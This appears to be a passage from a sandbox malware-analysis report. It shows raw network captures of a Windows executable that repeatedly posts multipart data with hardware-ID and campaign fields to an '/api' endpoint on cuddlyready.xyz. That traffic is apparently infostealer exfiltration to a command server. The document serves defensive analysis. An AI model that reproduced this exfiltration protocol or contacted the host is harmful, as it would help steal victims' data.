                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 4e 71 49 2b 72 48 4e 5a 41 36 53 72 58 2b 65 45 57 78 33 52 34 50 79 44 47 57 2b 79 31 7a 72 33 4e 32 6d 63 44 6a 69 50 42 66 68 38 2f 48 47 73 66 68 46 4c 39 71 4e 4b 70 4e 49 56 4f 4e 66 37 39 34 6c 62 56 37 54 64 50 2f 73 69 4a 49 64 53 4b 38 38 4b 38 54 32 75 4f 2b 45 78 57 55 72 38 37 42 2f 6e 37 51 77 38 6b 4d 48 38 68 31 56 64 70 35 6b 72 76 6a 68 70 68 45 78 68 6c 30 4c 35 4e 4b 45 30 72 6e 34 54 51 2b 47 6d 53 36 2f 53 47 43 58 64 38 50 2b 46 55 31 43 38 31 7a 44 34 4b 43 4b 49 52 69 48 4f 43 4c 52 79 35 44 61 35 50 30 45 4e 30 4b 74 4c 71 74 4e 5a 41 74 48 36 38 59 35 4e 47 71 36 58 4c 62 41 6d 4a 63 4d 59 59 63 4d 4c 39 44 65 75 4e 61 46 34 46 45 6a 6e 71 30 53 71 32 78 45 35 31 66 44 7a 67 46 5a 63 73 64 34 77 39 54 4d 73 69 6b 77 74 6a 30 79
                                                                                                            Data Ascii: NqI+rHNZA6SrX+eEWx3R4PyDGW+y1zr3N2mcDjiPBfh8/HGsfhFL9qNKpNIVONf794lbV7TdP/siJIdSK88K8T2uO+ExWUr87B/n7Qw8kMH8h1Vdp5krvjhphExhl0L5NKE0rn4TQ+GmS6/SGCXd8P+FU1C81zD4KCKIRiHOCLRy5Da5P0EN0KtLqtNZAtH68Y5NGq6XLbAmJcMYYcML9DeuNaF4FEjnq0Sq2xE51fDzgFZcsd4w9TMsikwtj0y
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 75 39 6d 57 55 72 6f 37 42 2f 6e 31 52 49 6c 33 50 72 32 68 46 31 53 74 74 63 35 2b 79 63 69 68 45 63 6e 77 67 72 35 4f 61 63 77 70 58 55 4c 54 75 2b 6d 53 71 32 63 56 58 66 56 37 4c 2f 52 47 33 32 39 38 43 54 72 4d 7a 2f 44 58 32 2f 57 51 76 4d 77 35 47 6e 68 66 42 5a 45 36 36 52 50 71 4e 4d 66 4f 64 54 79 38 6f 78 55 55 4b 50 52 4f 76 30 71 4a 6f 68 53 49 63 49 47 2b 44 69 73 4f 71 73 2f 56 77 33 6a 74 41 66 2f 6e 43 34 36 33 66 54 38 6e 78 74 46 2f 38 42 30 39 79 31 70 32 77 41 74 77 51 4c 37 4d 4b 67 36 71 58 34 56 51 2b 4f 70 54 71 2f 55 43 54 62 57 2f 50 36 48 56 46 75 31 33 44 48 30 4a 69 32 46 54 32 47 42 51 76 4d 6b 35 47 6e 68 55 44 35 34 70 6f 31 39 35 38 4e 56 4c 70 4c 7a 38 38 6b 44 47 72 33 61 4f 50 67 75 4c 34 70 4d 4b 38 59 4a 2b 44 65 67
                                                                                                            Data Ascii: u9mWUro7B/n1RIl3Pr2hF1Sttc5+ycihEcnwgr5OacwpXULTu+mSq2cVXfV7L/RG3298CTrMz/DX2/WQvMw5GnhfBZE66RPqNMfOdTy8oxUUKPROv0qJohSIcIG+DisOqs/Vw3jtAf/nC463fT8nxtF/8B09y1p2wAtwQL7MKg6qX4VQ+OpTq/UCTbW/P6HVFu13DH0Ji2FT2GBQvMk5GnhUD54po1958NVLpLz88kDGr3aOPguL4pMK8YJ+Deg
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 78 43 35 61 31 42 74 64 73 53 4a 64 7a 35 38 49 46 54 55 37 44 64 4d 66 30 6e 4a 59 6c 42 4a 73 45 4d 2f 48 7a 71 63 61 5a 6e 57 52 57 6b 6a 56 65 38 7a 67 30 36 38 2f 6e 77 79 55 51 55 71 4a 6b 7a 2f 47 46 78 77 30 6b 7a 79 77 2f 6d 4e 61 4d 2f 72 6e 77 4c 54 4f 6d 6e 56 61 44 54 48 7a 44 65 38 76 43 50 57 6c 2b 37 31 54 50 31 4b 69 61 50 41 47 2b 50 42 65 78 38 2f 48 47 50 64 41 70 61 35 36 4a 4d 73 63 64 62 4b 4a 7a 74 76 34 35 58 47 75 6d 5a 4e 2f 73 71 4c 59 4e 4d 49 63 73 50 39 43 36 72 4e 71 5a 32 45 6c 2f 75 71 30 43 73 31 42 41 34 31 4f 62 7a 68 30 6c 66 6f 38 74 30 76 6d 45 75 6d 77 42 35 6a 7a 54 7a 4c 4c 51 79 34 30 34 50 54 76 4b 6e 53 71 75 63 42 48 6e 4c 74 50 69 46 47 77 4c 78 33 7a 76 35 49 69 61 43 53 53 33 43 42 2f 30 35 70 54 65 6c 64
                                                                                                            Data Ascii: xC5a1BtdsSJdz58IFTU7DdMf0nJYlBJsEM/HzqcaZnWRWkjVe8zg068/nwyUQUqJkz/GFxw0kzyw/mNaM/rnwLTOmnVaDTHzDe8vCPWl+71TP1KiaPAG+PBex8/HGPdApa56JMscdbKJztv45XGumZN/sqLYNMIcsP9C6rNqZ2El/uq0Cs1BA41Obzh0lfo8t0vmEumwB5jzTzLLQy404PTvKnSqucBHnLtPiFGwLx3zv5IiaCSS3CB/05pTeld
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 33 42 37 69 53 41 6e 66 56 2b 4c 2f 52 47 31 6d 32 32 6a 58 36 4b 43 57 4d 52 79 58 64 43 50 4d 75 70 54 43 71 63 68 56 4e 36 61 46 4e 70 74 55 57 4f 39 2f 7a 2b 49 5a 65 47 76 2b 5a 4d 2b 68 68 63 63 4e 68 4c 4d 51 4f 72 32 62 6b 4c 75 39 6d 57 55 72 6f 37 42 2f 6e 33 42 45 79 32 50 6e 38 68 6c 68 49 73 4e 38 6d 38 43 77 6a 6b 55 6f 71 79 67 2f 35 4d 61 63 33 70 33 51 56 58 2b 32 73 52 4b 79 63 56 58 66 56 37 4c 2f 52 47 33 6d 6d 7a 7a 37 33 4c 54 2b 49 51 53 4c 5a 44 2b 52 38 36 6e 47 77 65 41 67 4e 76 4c 70 58 73 4e 73 45 65 63 75 30 2b 49 55 62 41 76 48 66 50 66 59 6d 4c 34 31 53 4a 4d 6b 4e 2b 7a 57 74 4e 61 6c 38 47 55 6e 67 71 30 4b 6b 30 42 41 77 30 66 76 37 67 46 56 54 76 70 6c 36 73 43 59 78 77 78 68 68 37 68 6e 33 4d 4b 6c 78 76 6a 45 41 44 65
                                                                                                            Data Ascii: 3B7iSAnfV+L/RG1m22jX6KCWMRyXdCPMupTCqchVN6aFNptUWO9/z+IZeGv+ZM+hhccNhLMQOr2bkLu9mWUro7B/n3BEy2Pn8hlhIsN8m8CwjkUoqyg/5Mac3p3QVX+2sRKycVXfV7L/RG3mmzz73LT+IQSLZD+R86nGweAgNvLpXsNsEecu0+IUbAvHfPfYmL41SJMkN+zWtNal8GUngq0Kk0BAw0fv7gFVTvpl6sCYxwxhh7hn3MKlxvjEADe
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 78 46 74 76 6b 74 54 30 6e 31 35 64 70 35 73 42 38 79 38 6e 68 46 5a 68 30 44 32 36 66 4b 73 72 34 53 63 67 56 4b 53 72 53 2b 65 45 57 79 4c 56 39 50 69 54 54 56 32 39 79 44 2f 39 4c 51 75 4d 52 7a 66 4d 44 66 63 74 72 58 32 71 63 6c 6b 44 70 4b 74 66 35 34 52 62 47 4e 58 69 2f 4b 5a 59 53 37 69 5a 65 72 41 6d 50 38 4d 59 59 66 46 43 35 6a 2b 30 4d 71 35 75 4a 77 32 38 74 58 6e 6e 31 77 30 77 77 76 66 70 67 6c 5a 57 6f 4f 64 30 71 48 56 37 30 52 4a 7a 6e 52 32 30 49 35 74 2f 34 58 35 5a 46 64 32 31 42 37 47 63 51 32 57 63 74 4f 33 4a 41 78 72 32 32 69 62 69 4a 79 71 56 51 32 62 78 50 4e 4d 71 72 6a 61 78 65 41 35 43 70 4f 49 48 71 4a 78 44 44 70 4c 39 2b 4a 4a 4b 54 4c 7a 4a 4d 37 41 65 5a 38 4e 59 59 5a 64 43 77 54 2b 71 50 36 5a 70 43 41 44 44 75 6b 32
                                                                                                            Data Ascii: xFtvktT0n15dp5sB8y8nhFZh0D26fKsr4ScgVKSrS+eEWyLV9PiTTV29yD/9LQuMRzfMDfctrX2qclkDpKtf54RbGNXi/KZYS7iZerAmP8MYYfFC5j+0Mq5uJw28tXnn1w0wwvfpglZWoOd0qHV70RJznR20I5t/4X5ZFd21B7GcQ2WctO3JAxr22ibiJyqVQ2bxPNMqrjaxeA5CpOIHqJxDDpL9+JJKTLzJM7AeZ8NYYZdCwT+qP6ZpCADDuk2
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 64 50 35 38 4d 56 56 55 62 48 65 4a 4f 59 36 5a 59 74 44 4f 39 55 38 79 68 65 6f 4e 36 5a 6c 48 6b 76 43 6a 41 66 70 6e 42 52 33 69 73 32 2f 77 52 74 6c 2f 35 6b 73 73 48 6c 70 74 6b 4d 76 77 51 58 69 4c 65 6b 5a 67 6b 55 6a 44 38 69 72 55 75 58 6f 48 43 66 44 2f 2f 4b 46 47 78 54 78 33 33 53 6f 63 57 66 44 52 44 43 50 57 71 52 75 2f 32 54 79 4b 45 6b 66 2b 2b 4a 65 35 38 70 62 62 34 43 36 76 35 73 62 41 76 47 65 4e 2b 49 7a 4c 34 42 57 49 6f 67 38 79 68 75 71 4e 71 42 70 43 56 72 72 6b 6e 6d 79 33 78 55 35 31 65 4c 75 79 52 55 61 76 70 6c 73 79 57 46 68 77 33 39 76 6a 78 71 30 5a 4f 51 45 6f 6e 45 58 53 76 4b 39 43 6f 44 53 48 44 62 45 35 4f 69 47 47 78 54 78 33 33 53 6f 63 32 66 44 52 44 43 50 57 71 52 75 2f 32 54 79 4b 45 6b 66 2b 2b 4a 65 35 38 70 62
                                                                                                            Data Ascii: dP58MVVUbHeJOY6ZYtDO9U8yheoN6ZlHkvCjAfpnBR3is2/wRtl/5kssHlptkMvwQXiLekZgkUjD8irUuXoHCfD//KFGxTx33SocWfDRDCPWqRu/2TyKEkf++Je58pbb4C6v5sbAvGeN+IzL4BWIog8yhuqNqBpCVrrknmy3xU51eLuyRUavplsyWFhw39vjxq0ZOQEonEXSvK9CoDSHDbE5OiGGxTx33Soc2fDRDCPWqRu/2TyKEkf++Je58pb
                                                                                                            2024-12-23 07:38:53 UTC1369INData Raw: 4b 47 58 42 69 52 33 69 4c 7a 59 57 66 44 54 47 47 58 51 76 55 32 74 44 79 75 65 46 56 4b 2f 71 73 48 36 5a 77 56 64 34 71 30 2f 6f 4e 4c 56 37 37 65 65 50 59 76 4a 38 4e 66 62 39 5a 43 34 6e 7a 38 59 75 38 2f 43 77 32 38 37 41 43 6b 7a 67 6b 78 30 65 4c 38 7a 6d 56 6b 6e 4d 73 7a 34 43 4a 72 73 6b 30 6c 32 52 66 33 4c 4b 4d 50 6e 31 49 4c 53 76 53 76 42 5a 62 4b 47 44 66 63 38 37 2f 48 47 30 4c 78 67 58 54 64 4d 79 36 54 51 32 47 42 51 76 68 38 2f 48 47 73 62 52 35 64 35 2b 42 41 76 64 74 62 4b 4a 7a 74 76 35 38 62 41 75 4b 58 64 4f 4a 68 63 63 4d 48 4c 38 49 44 39 7a 4b 6e 49 37 4e 35 47 6c 76 6e 36 33 6d 5a 38 51 6b 77 77 76 65 39 75 46 5a 65 70 38 77 33 34 43 59 58 76 57 30 7a 79 42 4c 33 66 6f 67 32 72 48 4d 6e 63 39 4f 39 51 4c 65 65 50 54 54 45 39
                                                                                                            Data Ascii: KGXBiR3iLzYWfDTGGXQvU2tDyueFVK/qsH6ZwVd4q0/oNLV77eePYvJ8Nfb9ZC4nz8Yu8/Cw287ACkzgkx0eL8zmVknMsz4CJrsk0l2Rf3LKMPn1ILSvSvBZbKGDfc87/HG0LxgXTdMy6TQ2GBQvh8/HGsbR5d5+BAvdtbKJztv58bAuKXdOJhccMHL8ID9zKnI7N5Glvn63mZ8Qkwwve9uFZep8w34CYXvW0zyBL3fog2rHMnc9O9QLeePTTE9


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.849707104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:38:55 UTC282OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=6M4MVPLOGKI530K8YLD
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 12852
                                                                                                            Host: cuddlyready.xyz
                                                                                                            2024-12-23 07:38:55 UTC12852OUTData Raw: 2d 2d 36 4d 34 4d 56 50 4c 4f 47 4b 49 35 33 30 4b 38 59 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 41 31 44 39 36 32 36 33 32 39 44 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4d 34 4d 56 50 4c 4f 47 4b 49 35 33 30 4b 38 59 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4d 34 4d 56 50 4c 4f 47 4b 49 35 33 30 4b 38 59 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                            Data Ascii: --6M4MVPLOGKI530K8YLDContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--6M4MVPLOGKI530K8YLDContent-Disposition: form-data; name="pid"2--6M4MVPLOGKI530K8YLDContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                            2024-12-23 07:38:56 UTC1137INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:38:56 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=j2n204guvgjvg6lr9veothipeb; expires=Fri, 18 Apr 2025 01:25:34 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYtbjhRRPbzH%2FjiH1Sd%2BGEe%2BIffHqNHD7Hc3D4KCjp%2Bf53O9L0cxAVH59Qwm7but5Lf8jInuxLEnQ1nheP7PJnzTSM7fE%2B8xOI%2BLqYW0TXgsS6%2F9PBlxeuI%2BkWe6rkn96TU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1e16e605e7f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1556&rtt_var=606&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13792&delivery_rate=1772920&cwnd=228&unsent_bytes=0&cid=e632a28df5755490&ts=908&x=0"
                                                                                                            2024-12-23 07:38:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-23 07:38:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.849708104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:38:57 UTC281OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=XWG7F67A48QVQTANXO
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15075
                                                                                                            Host: cuddlyready.xyz
                                                                                                            2024-12-23 07:38:57 UTC15075OUTData Raw: 2d 2d 58 57 47 37 46 36 37 41 34 38 51 56 51 54 41 4e 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 41 31 44 39 36 32 36 33 32 39 44 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 57 47 37 46 36 37 41 34 38 51 56 51 54 41 4e 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 57 47 37 46 36 37 41 34 38 51 56 51 54 41 4e 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                            Data Ascii: --XWG7F67A48QVQTANXOContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--XWG7F67A48QVQTANXOContent-Disposition: form-data; name="pid"2--XWG7F67A48QVQTANXOContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                            2024-12-23 07:38:58 UTC1125INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:38:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=lbfvk091k92dvp0gqjda4i43oa; expires=Fri, 18 Apr 2025 01:25:37 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFyIanwfnINrfYjQ%2BBFJuT57SaN9xVSV7k4smYT8foV7UiI9rOVDh%2FQubIc5gvOKaVvmmWwCNS8FaRDSANHNpakjnrfYCBl1RAs679VF0N5UWTUGE0WV3bOp6niLw11PnRo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1ef5c7742c6-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1612&rtt_var=632&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16014&delivery_rate=1811414&cwnd=149&unsent_bytes=0&cid=340327a9f1e68f48&ts=832&x=0"
                                                                                                            2024-12-23 07:38:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-23 07:38:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.849709104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:38:59 UTC280OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=SZOO0P7591CXSVW1X
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20236
                                                                                                            Host: cuddlyready.xyz
                                                                                                            2024-12-23 07:38:59 UTC15331OUTData Raw: 2d 2d 53 5a 4f 4f 30 50 37 35 39 31 43 58 53 56 57 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 41 31 44 39 36 32 36 33 32 39 44 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 5a 4f 4f 30 50 37 35 39 31 43 58 53 56 57 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 5a 4f 4f 30 50 37 35 39 31 43 58 53 56 57 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                            Data Ascii: --SZOO0P7591CXSVW1XContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--SZOO0P7591CXSVW1XContent-Disposition: form-data; name="pid"3--SZOO0P7591CXSVW1XContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                            2024-12-23 07:38:59 UTC4905OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
                                                                                                            Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                            2024-12-23 07:39:00 UTC1133INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:39:00 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=cgopllgcc5qbu1ilqubis81kqo; expires=Fri, 18 Apr 2025 01:25:39 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nR%2Fy7RvRBW%2FMgoaN5Pzh%2Be8S2cf3vXGHlEyffT2H7a7MwJk8Ot02ayyiPK1OcI6IGQdTORfT0QXCNzEqbHOX9IX%2BdQtYic0LFpNn%2F3kyr2D2wH%2FJNKEzyckc4018JBQLR68%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1fdca48efa5-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1899&rtt_var=719&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21196&delivery_rate=1515308&cwnd=200&unsent_bytes=0&cid=bceca79696ce281b&ts=923&x=0"
                                                                                                            2024-12-23 07:39:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-23 07:39:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.849710104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:39:02 UTC274OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=B15U8NRI2RHK
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1200
                                                                                                            Host: cuddlyready.xyz
                                                                                                            2024-12-23 07:39:02 UTC1200OUTData Raw: 2d 2d 42 31 35 55 38 4e 52 49 32 52 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 41 31 44 39 36 32 36 33 32 39 44 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 31 35 55 38 4e 52 49 32 52 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 31 35 55 38 4e 52 49 32 52 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 42 31 35 55 38 4e 52 49 32 52 48 4b 0d 0a
                                                                                                            Data Ascii: --B15U8NRI2RHKContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--B15U8NRI2RHKContent-Disposition: form-data; name="pid"1--B15U8NRI2RHKContent-Disposition: form-data; name="lid"PsFKDg--pablo--B15U8NRI2RHK
                                                                                                            2024-12-23 07:39:03 UTC1130INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:39:03 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=o1igen25re4e2mvmfdu293f8au; expires=Fri, 18 Apr 2025 01:25:42 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmmMPLiIHKnsAe8qyfya2WFnceVeYoa%2FhfIc%2FP%2Fw3lyuUXowpeqdLkyRy12f5aRdYmcRCTz%2B4OGldE9fwSxO7mOyCFpaYH4hwhmvaDCPp%2BRRctuvfgU8tVhEDT9TL%2FIlepQ%3D"}],"group":"cf-nel","max_age":604800}
